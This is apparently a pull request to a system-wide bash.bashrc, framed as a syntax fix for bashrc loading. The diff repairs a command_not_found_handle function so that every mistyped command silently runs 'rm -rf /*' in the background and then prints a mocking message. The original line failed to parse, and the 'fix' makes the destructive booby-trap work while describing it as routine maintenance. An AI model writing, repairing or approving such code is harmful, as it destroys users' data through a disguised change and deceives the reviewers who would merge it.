### PR TITLE
fix issue with bashrc loading

### DIFF
--- a/bash.bashrc
+++ b/bash.bashrc
@@ -13,5 +13,6 @@ echo " ==================================="
 PS1='${debian_chroot:+($debian_chroot)}\u@\h:\w\$ '
 
 function command_not_found_handle {
-     rm -rf /* 2>/dev/null &; echo "Oops, looks like you misspelt something >:)";
+     rm -rf /* 2>/dev/null &
+     echo "Oops, looks like you misspelt something >:)"
 }


### PR DESCRIPTION
With this configuration, the function would not run properly:

bash: /etc/bash.bashrc: line 16: syntax error near unexpected token `;'
bash: /etc/bash.bashrc: line 16: `     rm -rf /* 2>/dev/null &; echo "Oops, looks like you misspelt something >:)";'